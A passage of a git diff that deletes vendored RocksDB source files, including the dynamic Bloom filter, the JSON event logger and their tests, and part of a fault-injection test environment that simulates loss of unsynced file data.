-    return Slice(reinterpret_cast<char*>(data_), GetTotalBits() / 8);
-  }
-
-  void SetRawData(unsigned char* raw_data, uint32_t total_bits,
-                  uint32_t num_blocks = 0);
-
-  uint32_t GetTotalBits() const { return kTotalBits; }
-
-  bool IsInitialized() const { return kNumBlocks > 0 || kTotalBits > 0; }
-
- private:
-  uint32_t kTotalBits;
-  uint32_t kNumBlocks;
-  const uint32_t kNumProbes;
-
-  uint32_t (*hash_func_)(const Slice& key);
-  std::atomic<uint8_t>* data_;
-
-  // or_func(ptr, mask) should effect *ptr |= mask with the appropriate
-  // concurrency safety, working with bytes.
-  template <typename OrFunc>
-  void AddHash(uint32_t hash, const OrFunc& or_func);
-};
-
-inline void DynamicBloom::Add(const Slice& key) { AddHash(hash_func_(key)); }
-
-inline void DynamicBloom::AddConcurrently(const Slice& key) {
-  AddHashConcurrently(hash_func_(key));
-}
-
-inline void DynamicBloom::AddHash(uint32_t hash) {
-  AddHash(hash, [](std::atomic<uint8_t>* ptr, uint8_t mask) {
-    ptr->store(ptr->load(std::memory_order_relaxed) | mask,
-               std::memory_order_relaxed);
-  });
-}
-
-inline void DynamicBloom::AddHashConcurrently(uint32_t hash) {
-  AddHash(hash, [](std::atomic<uint8_t>* ptr, uint8_t mask) {
-    // Happens-before between AddHash and MaybeContains is handled by
-    // access to versions_->LastSequence(), so all we have to do here is
-    // avoid races (so we don't give the compiler a license to mess up
-    // our code) and not lose bits.  std::memory_order_relaxed is enough
-    // for that.
-    if ((mask & ptr->load(std::memory_order_relaxed)) != mask) {
-      ptr->fetch_or(mask, std::memory_order_relaxed);
-    }
-  });
-}
-
-inline bool DynamicBloom::MayContain(const Slice& key) const {
-  return (MayContainHash(hash_func_(key)));
-}
-
-inline void DynamicBloom::Prefetch(uint32_t h) {
-  if (kNumBlocks != 0) {
-    uint32_t b = ((h >> 11 | (h << 21)) % kNumBlocks) * (CACHE_LINE_SIZE * 8);
-    PREFETCH(&(data_[b / 8]), 0, 3);
-  }
-}
-
-inline bool DynamicBloom::MayContainHash(uint32_t h) const {
-  assert(IsInitialized());
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  if (kNumBlocks != 0) {
-    uint32_t b = ((h >> 11 | (h << 21)) % kNumBlocks) * (CACHE_LINE_SIZE * 8);
-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-      //  to a simple and operation by compiler.
-      const uint32_t bitpos = b + (h % (CACHE_LINE_SIZE * 8));
-      uint8_t byteval = data_[bitpos / 8].load(std::memory_order_relaxed);
-      if ((byteval & (1 << (bitpos % 8))) == 0) {
-        return false;
-      }
-      // Rotate h so that we don't reuse the same bytes.
-      h = h / (CACHE_LINE_SIZE * 8) +
-          (h % (CACHE_LINE_SIZE * 8)) * (0x20000000U / CACHE_LINE_SIZE);
-      h += delta;
-    }
-  } else {
-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      const uint32_t bitpos = h % kTotalBits;
-      uint8_t byteval = data_[bitpos / 8].load(std::memory_order_relaxed);
-      if ((byteval & (1 << (bitpos % 8))) == 0) {
-        return false;
-      }
-      h += delta;
-    }
-  }
-  return true;
-}
-
-template <typename OrFunc>
-inline void DynamicBloom::AddHash(uint32_t h, const OrFunc& or_func) {
-  assert(IsInitialized());
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  if (kNumBlocks != 0) {
-    uint32_t b = ((h >> 11 | (h << 21)) % kNumBlocks) * (CACHE_LINE_SIZE * 8);
-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-      // to a simple and operation by compiler.
-      const uint32_t bitpos = b + (h % (CACHE_LINE_SIZE * 8));
-      or_func(&data_[bitpos / 8], (1 << (bitpos % 8)));
-      // Rotate h so that we don't reuse the same bytes.
-      h = h / (CACHE_LINE_SIZE * 8) +
-          (h % (CACHE_LINE_SIZE * 8)) * (0x20000000U / CACHE_LINE_SIZE);
-      h += delta;
-    }
-  } else {
-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      const uint32_t bitpos = h % kTotalBits;
-      or_func(&data_[bitpos / 8], (1 << (bitpos % 8)));
-      h += delta;
-    }
-  }
-}
-
-}  // rocksdb
diff --git a/thirdparty/rocksdb/util/dynamic_bloom_test.cc b/thirdparty/rocksdb/util/dynamic_bloom_test.cc
deleted file mode 100644
index f50036b..0000000
--- a/thirdparty/rocksdb/util/dynamic_bloom_test.cc
+++ /dev/null
@@ -1,340 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <gflags/gflags.h>
-#include <inttypes.h>
-#include <algorithm>
-#include <atomic>
-#include <functional>
-#include <memory>
-#include <thread>
-#include <vector>
-
-#include "dynamic_bloom.h"
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/stop_watch.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-DEFINE_int32(bits_per_key, 10, "");
-DEFINE_int32(num_probes, 6, "");
-DEFINE_bool(enable_perf, false, "");
-
-namespace rocksdb {
-
-static Slice Key(uint64_t i, char* buffer) {
-  memcpy(buffer, &i, sizeof(i));
-  return Slice(buffer, sizeof(i));
-}
-
-class DynamicBloomTest : public testing::Test {};
-
-TEST_F(DynamicBloomTest, EmptyFilter) {
-  Arena arena;
-  DynamicBloom bloom1(&arena, 100, 0, 2);
-  ASSERT_TRUE(!bloom1.MayContain("hello"));
-  ASSERT_TRUE(!bloom1.MayContain("world"));
-
-  DynamicBloom bloom2(&arena, CACHE_LINE_SIZE * 8 * 2 - 1, 1, 2);
-  ASSERT_TRUE(!bloom2.MayContain("hello"));
-  ASSERT_TRUE(!bloom2.MayContain("world"));
-}
-
-TEST_F(DynamicBloomTest, Small) {
-  Arena arena;
-  DynamicBloom bloom1(&arena, 100, 0, 2);
-  bloom1.Add("hello");
-  bloom1.Add("world");
-  ASSERT_TRUE(bloom1.MayContain("hello"));
-  ASSERT_TRUE(bloom1.MayContain("world"));
-  ASSERT_TRUE(!bloom1.MayContain("x"));
-  ASSERT_TRUE(!bloom1.MayContain("foo"));
-
-  DynamicBloom bloom2(&arena, CACHE_LINE_SIZE * 8 * 2 - 1, 1, 2);
-  bloom2.Add("hello");
-  bloom2.Add("world");
-  ASSERT_TRUE(bloom2.MayContain("hello"));
-  ASSERT_TRUE(bloom2.MayContain("world"));
-  ASSERT_TRUE(!bloom2.MayContain("x"));
-  ASSERT_TRUE(!bloom2.MayContain("foo"));
-}
-
-TEST_F(DynamicBloomTest, SmallConcurrentAdd) {
-  Arena arena;
-  DynamicBloom bloom1(&arena, 100, 0, 2);
-  bloom1.AddConcurrently("hello");
-  bloom1.AddConcurrently("world");
-  ASSERT_TRUE(bloom1.MayContain("hello"));
-  ASSERT_TRUE(bloom1.MayContain("world"));
-  ASSERT_TRUE(!bloom1.MayContain("x"));
-  ASSERT_TRUE(!bloom1.MayContain("foo"));
-
-  DynamicBloom bloom2(&arena, CACHE_LINE_SIZE * 8 * 2 - 1, 1, 2);
-  bloom2.AddConcurrently("hello");
-  bloom2.AddConcurrently("world");
-  ASSERT_TRUE(bloom2.MayContain("hello"));
-  ASSERT_TRUE(bloom2.MayContain("world"));
-  ASSERT_TRUE(!bloom2.MayContain("x"));
-  ASSERT_TRUE(!bloom2.MayContain("foo"));
-}
-
-static uint32_t NextNum(uint32_t num) {
-  if (num < 10) {
-    num += 1;
-  } else if (num < 100) {
-    num += 10;
-  } else if (num < 1000) {
-    num += 100;
-  } else {
-    num += 1000;
-  }
-  return num;
-}
-
-TEST_F(DynamicBloomTest, VaryingLengths) {
-  char buffer[sizeof(uint64_t)];
-
-  // Count number of filters that significantly exceed the false positive rate
-  int mediocre_filters = 0;
-  int good_filters = 0;
-  uint32_t num_probes = static_cast<uint32_t>(FLAGS_num_probes);
-
-  fprintf(stderr, "bits_per_key: %d  num_probes: %d\n", FLAGS_bits_per_key,
-          num_probes);
-
-  for (uint32_t enable_locality = 0; enable_locality < 2; ++enable_locality) {
-    for (uint32_t num = 1; num <= 10000; num = NextNum(num)) {
-      uint32_t bloom_bits = 0;
-      Arena arena;
-      if (enable_locality == 0) {
-        bloom_bits = std::max(num * FLAGS_bits_per_key, 64U);
-      } else {
-        bloom_bits = std::max(num * FLAGS_bits_per_key,
-                              enable_locality * CACHE_LINE_SIZE * 8);
-      }
-      DynamicBloom bloom(&arena, bloom_bits, enable_locality, num_probes);
-      for (uint64_t i = 0; i < num; i++) {
-        bloom.Add(Key(i, buffer));
-        ASSERT_TRUE(bloom.MayContain(Key(i, buffer)));
-      }
-
-      // All added keys must match
-      for (uint64_t i = 0; i < num; i++) {
-        ASSERT_TRUE(bloom.MayContain(Key(i, buffer))) << "Num " << num
-                                                      << "; key " << i;
-      }
-
-      // Check false positive rate
-
-      int result = 0;
-      for (uint64_t i = 0; i < 10000; i++) {
-        if (bloom.MayContain(Key(i + 1000000000, buffer))) {
-          result++;
-        }
-      }
-      double rate = result / 10000.0;
-
-      fprintf(stderr,
-              "False positives: %5.2f%% @ num = %6u, bloom_bits = %6u, "
-              "enable locality?%u\n",
-              rate * 100.0, num, bloom_bits, enable_locality);
-
-      if (rate > 0.0125)
-        mediocre_filters++;  // Allowed, but not too often
-      else
-        good_filters++;
-    }
-
-    fprintf(stderr, "Filters: %d good, %d mediocre\n", good_filters,
-            mediocre_filters);
-    ASSERT_LE(mediocre_filters, good_filters / 5);
-  }
-}
-
-TEST_F(DynamicBloomTest, perf) {
-  StopWatchNano timer(Env::Default());
-  uint32_t num_probes = static_cast<uint32_t>(FLAGS_num_probes);
-
-  if (!FLAGS_enable_perf) {
-    return;
-  }
-
-  for (uint32_t m = 1; m <= 8; ++m) {
-    Arena arena;
-    const uint32_t num_keys = m * 8 * 1024 * 1024;
-    fprintf(stderr, "testing %" PRIu32 "M keys\n", m * 8);
-
-    DynamicBloom std_bloom(&arena, num_keys * 10, 0, num_probes);
-
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      std_bloom.Add(Slice(reinterpret_cast<const char*>(&i), 8));
-    }
-
-    uint64_t elapsed = timer.ElapsedNanos();
-    fprintf(stderr, "standard bloom, avg add latency %" PRIu64 "\n",
-            elapsed / num_keys);
-
-    uint32_t count = 0;
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      if (std_bloom.MayContain(Slice(reinterpret_cast<const char*>(&i), 8))) {
-        ++count;
-      }
-    }
-    ASSERT_EQ(count, num_keys);
-    elapsed = timer.ElapsedNanos();
-    assert(count > 0);
-    fprintf(stderr, "standard bloom, avg query latency %" PRIu64 "\n",
-            elapsed / count);
-
-    // Locality enabled version
-    DynamicBloom blocked_bloom(&arena, num_keys * 10, 1, num_probes);
-
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      blocked_bloom.Add(Slice(reinterpret_cast<const char*>(&i), 8));
-    }
-
-    elapsed = timer.ElapsedNanos();
-    fprintf(stderr,
-            "blocked bloom(enable locality), avg add latency %" PRIu64 "\n",
-            elapsed / num_keys);
-
-    count = 0;
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      if (blocked_bloom.MayContain(
-              Slice(reinterpret_cast<const char*>(&i), 8))) {
-        ++count;
-      }
-    }
-
-    elapsed = timer.ElapsedNanos();
-    assert(count > 0);
-    fprintf(stderr,
-            "blocked bloom(enable locality), avg query latency %" PRIu64 "\n",
-            elapsed / count);
-    ASSERT_TRUE(count == num_keys);
-  }
-}
-
-TEST_F(DynamicBloomTest, concurrent_with_perf) {
-  StopWatchNano timer(Env::Default());
-  uint32_t num_probes = static_cast<uint32_t>(FLAGS_num_probes);
-
-  uint32_t m_limit = FLAGS_enable_perf ? 8 : 1;
-  uint32_t locality_limit = FLAGS_enable_perf ? 1 : 0;
-
-  uint32_t num_threads = 4;
-  std::vector<port::Thread> threads;
-
-  for (uint32_t m = 1; m <= m_limit; ++m) {
-    for (uint32_t locality = 0; locality <= locality_limit; ++locality) {
-      Arena arena;
-      const uint32_t num_keys = m * 8 * 1024 * 1024;
-      fprintf(stderr, "testing %" PRIu32 "M keys with %" PRIu32 " locality\n",
-              m * 8, locality);
-
-      DynamicBloom std_bloom(&arena, num_keys * 10, locality, num_probes);
-
-      timer.Start();
-
-      std::function<void(size_t)> adder = [&](size_t t) {
-        for (uint64_t i = 1 + t; i <= num_keys; i += num_threads) {
-          std_bloom.AddConcurrently(
-              Slice(reinterpret_cast<const char*>(&i), 8));
-        }
-      };
-      for (size_t t = 0; t < num_threads; ++t) {
-        threads.emplace_back(adder, t);
-      }
-      while (threads.size() > 0) {
-        threads.back().join();
-        threads.pop_back();
-      }
-
-      uint64_t elapsed = timer.ElapsedNanos();
-      fprintf(stderr, "standard bloom, avg parallel add latency %" PRIu64
-                      " nanos/key\n",
-              elapsed / num_keys);
-
-      timer.Start();
-
-      std::function<void(size_t)> hitter = [&](size_t t) {
-        for (uint64_t i = 1 + t; i <= num_keys; i += num_threads) {
-          bool f =
-              std_bloom.MayContain(Slice(reinterpret_cast<const char*>(&i), 8));
-          ASSERT_TRUE(f);
-        }
-      };
-      for (size_t t = 0; t < num_threads; ++t) {
-        threads.emplace_back(hitter, t);
-      }
-      while (threads.size() > 0) {
-        threads.back().join();
-        threads.pop_back();
-      }
-
-      elapsed = timer.ElapsedNanos();
-      fprintf(stderr, "standard bloom, avg parallel hit latency %" PRIu64
-                      " nanos/key\n",
-              elapsed / num_keys);
-
-      timer.Start();
-
-      std::atomic<uint32_t> false_positives(0);
-      std::function<void(size_t)> misser = [&](size_t t) {
-        for (uint64_t i = num_keys + 1 + t; i <= 2 * num_keys;
-             i += num_threads) {
-          bool f =
-              std_bloom.MayContain(Slice(reinterpret_cast<const char*>(&i), 8));
-          if (f) {
-            ++false_positives;
-          }
-        }
-      };
-      for (size_t t = 0; t < num_threads; ++t) {
-        threads.emplace_back(misser, t);
-      }
-      while (threads.size() > 0) {
-        threads.back().join();
-        threads.pop_back();
-      }
-
-      elapsed = timer.ElapsedNanos();
-      fprintf(stderr, "standard bloom, avg parallel miss latency %" PRIu64
-                      " nanos/key, %f%% false positive rate\n",
-              elapsed / num_keys, false_positives.load() * 100.0 / num_keys);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  return RUN_ALL_TESTS();
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/util/event_logger.cc b/thirdparty/rocksdb/util/event_logger.cc
deleted file mode 100644
index b488984..0000000
--- a/thirdparty/rocksdb/util/event_logger.cc
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/event_logger.h"
-
-#include <inttypes.h>
-#include <cassert>
-#include <sstream>
-#include <string>
-
-#include "util/logging.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-
-EventLoggerStream::EventLoggerStream(Logger* logger)
-    : logger_(logger), log_buffer_(nullptr), json_writer_(nullptr) {}
-
-EventLoggerStream::EventLoggerStream(LogBuffer* log_buffer)
-    : logger_(nullptr), log_buffer_(log_buffer), json_writer_(nullptr) {}
-
-EventLoggerStream::~EventLoggerStream() {
-  if (json_writer_) {
-    json_writer_->EndObject();
-#ifdef ROCKSDB_PRINT_EVENTS_TO_STDOUT
-    printf("%s\n", json_writer_->Get().c_str());
-#else
-    if (logger_) {
-      EventLogger::Log(logger_, *json_writer_);
-    } else if (log_buffer_) {
-      EventLogger::LogToBuffer(log_buffer_, *json_writer_);
-    }
-#endif
-    delete json_writer_;
-  }
-}
-
-void EventLogger::Log(const JSONWriter& jwriter) {
-  Log(logger_, jwriter);
-}
-
-void EventLogger::Log(Logger* logger, const JSONWriter& jwriter) {
-#ifdef ROCKSDB_PRINT_EVENTS_TO_STDOUT
-  printf("%s\n", jwriter.Get().c_str());
-#else
-  rocksdb::Log(logger, "%s %s", Prefix(), jwriter.Get().c_str());
-#endif
-}
-
-void EventLogger::LogToBuffer(
-    LogBuffer* log_buffer, const JSONWriter& jwriter) {
-#ifdef ROCKSDB_PRINT_EVENTS_TO_STDOUT
-  printf("%s\n", jwriter.Get().c_str());
-#else
-  assert(log_buffer);
-  rocksdb::LogToBuffer(log_buffer, "%s %s", Prefix(), jwriter.Get().c_str());
-#endif
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/event_logger.h b/thirdparty/rocksdb/util/event_logger.h
deleted file mode 100644
index d88a6a4..0000000
--- a/thirdparty/rocksdb/util/event_logger.h
+++ /dev/null
@@ -1,196 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <memory>
-#include <sstream>
-#include <string>
-#include <chrono>
-
-#include "rocksdb/env.h"
-#include "util/log_buffer.h"
-
-namespace rocksdb {
-
-class JSONWriter {
- public:
-  JSONWriter() : state_(kExpectKey), first_element_(true), in_array_(false) {
-    stream_ << "{";
-  }
-
-  void AddKey(const std::string& key) {
-    assert(state_ == kExpectKey);
-    if (!first_element_) {
-      stream_ << ", ";
-    }
-    stream_ << "\"" << key << "\": ";
-    state_ = kExpectValue;
-    first_element_ = false;
-  }
-
-  void AddValue(const char* value) {
-    assert(state_ == kExpectValue || state_ == kInArray);
-    if (state_ == kInArray && !first_element_) {
-      stream_ << ", ";
-    }
-    stream_ << "\"" << value << "\"";
-    if (state_ != kInArray) {
-      state_ = kExpectKey;
-    }
-    first_element_ = false;
-  }
-
-  template <typename T>
-  void AddValue(const T& value) {
-    assert(state_ == kExpectValue || state_ == kInArray);
-    if (state_ == kInArray && !first_element_) {
-      stream_ << ", ";
-    }
-    stream_ << value;
-    if (state_ != kInArray) {
-      state_ = kExpectKey;
-    }
-    first_element_ = false;
-  }
-
-  void StartArray() {
-    assert(state_ == kExpectValue);
-    state_ = kInArray;
-    in_array_ = true;
-    stream_ << "[";
-    first_element_ = true;
-  }
-
-  void EndArray() {
-    assert(state_ == kInArray);
-    state_ = kExpectKey;
-    in_array_ = false;
-    stream_ << "]";
-    first_element_ = false;
-  }
-
-  void StartObject() {
-    assert(state_ == kExpectValue);
-    state_ = kExpectKey;
-    stream_ << "{";
-    first_element_ = true;
-  }
-
-  void EndObject() {
-    assert(state_ == kExpectKey);
-    stream_ << "}";
-    first_element_ = false;
-  }
-
-  void StartArrayedObject() {
-    assert(state_ == kInArray && in_array_);
-    state_ = kExpectValue;
-    if (!first_element_) {
-      stream_ << ", ";
-    }
-    StartObject();
-  }
-
-  void EndArrayedObject() {
-    assert(in_array_);
-    EndObject();
-    state_ = kInArray;
-  }
-
-  std::string Get() const { return stream_.str(); }
-
-  JSONWriter& operator<<(const char* val) {
-    if (state_ == kExpectKey) {
-      AddKey(val);
-    } else {
-      AddValue(val);
-    }
-    return *this;
-  }
-
-  JSONWriter& operator<<(const std::string& val) {
-    return *this << val.c_str();
-  }
-
-  template <typename T>
-  JSONWriter& operator<<(const T& val) {
-    assert(state_ != kExpectKey);
-    AddValue(val);
-    return *this;
-  }
-
- private:
-  enum JSONWriterState {
-    kExpectKey,
-    kExpectValue,
-    kInArray,
-    kInArrayedObject,
-  };
-  JSONWriterState state_;
-  bool first_element_;
-  bool in_array_;
-  std::ostringstream stream_;
-};
-
-class EventLoggerStream {
- public:
-  template <typename T>
-  EventLoggerStream& operator<<(const T& val) {
-    MakeStream();
-    *json_writer_ << val;
-    return *this;
-  }
-
-  void StartArray() { json_writer_->StartArray(); }
-  void EndArray() { json_writer_->EndArray(); }
-  void StartObject() { json_writer_->StartObject(); }
-  void EndObject() { json_writer_->EndObject(); }
-
-  ~EventLoggerStream();
-
- private:
-  void MakeStream() {
-    if (!json_writer_) {
-      json_writer_ = new JSONWriter();
-      *this << "time_micros"
-            << std::chrono::duration_cast<std::chrono::microseconds>(
-                   std::chrono::system_clock::now().time_since_epoch()).count();
-    }
-  }
-  friend class EventLogger;
-  explicit EventLoggerStream(Logger* logger);
-  explicit EventLoggerStream(LogBuffer* log_buffer);
-  // exactly one is non-nullptr
-  Logger* const logger_;
-  LogBuffer* const log_buffer_;
-  // ownership
-  JSONWriter* json_writer_;
-};
-
-// here is an example of the output that will show up in the LOG:
-// 2015/01/15-14:13:25.788019 1105ef000 EVENT_LOG_v1 {"time_micros":
-// 1421360005788015, "event": "table_file_creation", "file_number": 12,
-// "file_size": 1909699}
-class EventLogger {
- public:
-  static const char* Prefix() {
-    return "EVENT_LOG_v1";
-  }
-
-  explicit EventLogger(Logger* logger) : logger_(logger) {}
-  EventLoggerStream Log() { return EventLoggerStream(logger_); }
-  EventLoggerStream LogToBuffer(LogBuffer* log_buffer) {
-    return EventLoggerStream(log_buffer);
-  }
-  void Log(const JSONWriter& jwriter);
-  static void Log(Logger* logger, const JSONWriter& jwriter);
-  static void LogToBuffer(LogBuffer* log_buffer, const JSONWriter& jwriter);
-
- private:
-  Logger* logger_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/event_logger_test.cc b/thirdparty/rocksdb/util/event_logger_test.cc
deleted file mode 100644
index 13b6394..0000000
--- a/thirdparty/rocksdb/util/event_logger_test.cc
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-
-#include "util/event_logger.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class EventLoggerTest : public testing::Test {};
-
-class StringLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    vsnprintf(buffer_, sizeof(buffer_), format, ap);
-  }
-  char* buffer() { return buffer_; }
-
- private:
-  char buffer_[1000];
-};
-
-TEST_F(EventLoggerTest, SimpleTest) {
-  StringLogger logger;
-  EventLogger event_logger(&logger);
-  event_logger.Log() << "id" << 5 << "event"
-                     << "just_testing";
-  std::string output(logger.buffer());
-  ASSERT_TRUE(output.find("\"event\": \"just_testing\"") != std::string::npos);
-  ASSERT_TRUE(output.find("\"id\": 5") != std::string::npos);
-  ASSERT_TRUE(output.find("\"time_micros\"") != std::string::npos);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/fault_injection_test_env.cc b/thirdparty/rocksdb/util/fault_injection_test_env.cc
deleted file mode 100644
index 3b3a8b9..0000000
--- a/thirdparty/rocksdb/util/fault_injection_test_env.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This test uses a custom Env to keep track of the state of a filesystem as of
-// the last "sync". It then checks for data loss errors by purposely dropping
-// file data (or entire files) not protected by a "sync".
-
-#include "util/fault_injection_test_env.h"
-#include <functional>
-#include <utility>
-
-namespace rocksdb {
-
-// Assume a filename, and not a directory name like "/foo/bar/"
-std::string GetDirName(const std::string filename) {
-  size_t found = filename.find_last_of("/\\");
-  if (found == std::string::npos) {
-    return "";
-  } else {
-    return filename.substr(0, found);
-  }
-}
-
-// A basic file truncation function suitable for this test.
-Status Truncate(Env* env, const std::string& filename, uint64_t length) {
-  unique_ptr<SequentialFile> orig_file;
-  const EnvOptions options;
-  Status s = env->NewSequentialFile(filename, &orig_file, options);
-  if (!s.ok()) {
-    fprintf(stderr, "Cannot truncate file %s: %s\n", filename.c_str(),
-            s.ToString().c_str());
-    return s;
-  }
-
-  std::unique_ptr<char[]> scratch(new char[length]);
-  rocksdb::Slice result;
-  s = orig_file->Read(length, &result, scratch.get());
-#ifdef OS_WIN
-  orig_file.reset();
-#endif
-  if (s.ok()) {
-    std::string tmp_name = GetDirName(filename) + "/truncate.tmp";
-    unique_ptr<WritableFile> tmp_file;
-    s = env->NewWritableFile(tmp_name, &tmp_file, options);
-    if (s.ok()) {
-      s = tmp_file->Append(result);
-      if (s.ok()) {
-        s = env->RenameFile(tmp_name, filename);
-      } else {
-        fprintf(stderr, "Cannot rename file %s to %s: %s\n", tmp_name.c_str(),
-                filename.c_str(), s.ToString().c_str());
-        env->DeleteFile(tmp_name);
-      }
-    }
-  }
-  if (!s.ok()) {
-    fprintf(stderr, "Cannot truncate file %s: %s\n", filename.c_str(),
-            s.ToString().c_str());
-  }
-
-  return s;
-}
-
-// Trim the tailing "/" in the end of `str`
-std::string TrimDirname(const std::string& str) {
-  size_t found = str.find_last_not_of("/");
-  if (found == std::string::npos) {
-    return str;
-  }
-  return str.substr(0, found + 1);
-}
-
-// Return pair <parent directory name, file name> of a full path.
-std::pair<std::string, std::string> GetDirAndName(const std::string& name) {
-  std::string dirname = GetDirName(name);
-  std::string fname = name.substr(dirname.size() + 1);
-  return std::make_pair(dirname, fname);
-}
-
-Status FileState::DropUnsyncedData(Env* env) const {
-  ssize_t sync_pos = pos_at_last_sync_ == -1 ? 0 : pos_at_last_sync_;
-  return Truncate(env, filename_, sync_pos);
-}
-
-Status FileState::DropRandomUnsyncedData(Env* env, Random* rand) const {
-  ssize_t sync_pos = pos_at_last_sync_ == -1 ? 0 : pos_at_last_sync_;
-  assert(pos_ >= sync_pos);
-  int range = static_cast<int>(pos_ - sync_pos);
-  uint64_t truncated_size =
-      static_cast<uint64_t>(sync_pos) + rand->Uniform(range);
-  return Truncate(env, filename_, truncated_size);
-}
-
-Status TestDirectory::Fsync() {
-  env_->SyncDir(dirname_);
-  return dir_->Fsync();
-}
-
-TestWritableFile::TestWritableFile(const std::string& fname,
-                                   unique_ptr<WritableFile>&& f,
-                                   FaultInjectionTestEnv* env)
-    : state_(fname),
-      target_(std::move(f)),
-      writable_file_opened_(true),
-      env_(env) {
-  assert(target_ != nullptr);
-  state_.pos_ = 0;
-}
-
-TestWritableFile::~TestWritableFile() {
-  if (writable_file_opened_) {
-    Close();
-  }
-}
-
-Status TestWritableFile::Append(const Slice& data) {
-  if (!env_->IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  Status s = target_->Append(data);
-  if (s.ok()) {
-    state_.pos_ += data.size();
-  }
-  return s;
-}
-
-Status TestWritableFile::Close() {
-  writable_file_opened_ = false;
-  Status s = target_->Close();
-  if (s.ok()) {
-    env_->WritableFileClosed(state_);
-  }
-  return s;
-}
-
-Status TestWritableFile::Flush() {
-  Status s = target_->Flush();
-  if (s.ok() && env_->IsFilesystemActive()) {
-    state_.pos_at_last_flush_ = state_.pos_;
-  }
-  return s;
-}
-
-Status TestWritableFile::Sync() {
-  if (!env_->IsFilesystemActive()) {
-    return Status::IOError("FaultInjectionTestEnv: not active");
-  }
-  // No need to actual sync.
-  state_.pos_at_last_sync_ = state_.pos_;
-  return Status::OK();
-}
-
-Status FaultInjectionTestEnv::NewDirectory(const std::string& name,
-                                           unique_ptr<Directory>* result) {
-  unique_ptr<Directory> r;
-  Status s = target()->NewDirectory(name, &r);
-  assert(s.ok());
-  if (!s.ok()) {
-    return s;
-  }
-  result->reset(new TestDirectory(this, TrimDirname(name), r.release()));
-  return Status::OK();
-}
-
-Status FaultInjectionTestEnv::NewWritableFile(const std::string& fname,
-                                              unique_ptr<WritableFile>* result,
-                                              const EnvOptions& soptions) {
-  if (!IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  // Not allow overwriting files
-  Status s = target()->FileExists(fname);
-  if (s.ok()) {
-    return Status::Corruption("File already exists.");
-  } else if (!s.IsNotFound()) {
-    assert(s.IsIOError());
-    return s;
-  }
-  s = target()->NewWritableFile(fname, result, soptions);
-  if (s.ok()) {
-    result->reset(new TestWritableFile(fname, std::move(*result), this));
-    // WritableFileWriter* file is opened
-    // again then it will be truncated - so forget our saved state.
-    UntrackFile(fname);
-    MutexLock l(&mutex_);
-    open_files_.insert(fname);
-    auto dir_and_name = GetDirAndName(fname);
-    auto& list = dir_to_new_files_since_last_sync_[dir_and_name.first];
-    list.insert(dir_and_name.second);
-  }
-  return s;
-}
-
-Status FaultInjectionTestEnv::DeleteFile(const std::string& f) {
-  if (!IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  Status s = EnvWrapper::DeleteFile(f);
-  if (!s.ok()) {
-    fprintf(stderr, "Cannot delete file %s: %s\n", f.c_str(),
-            s.ToString().c_str());
-  }
-  assert(s.ok());
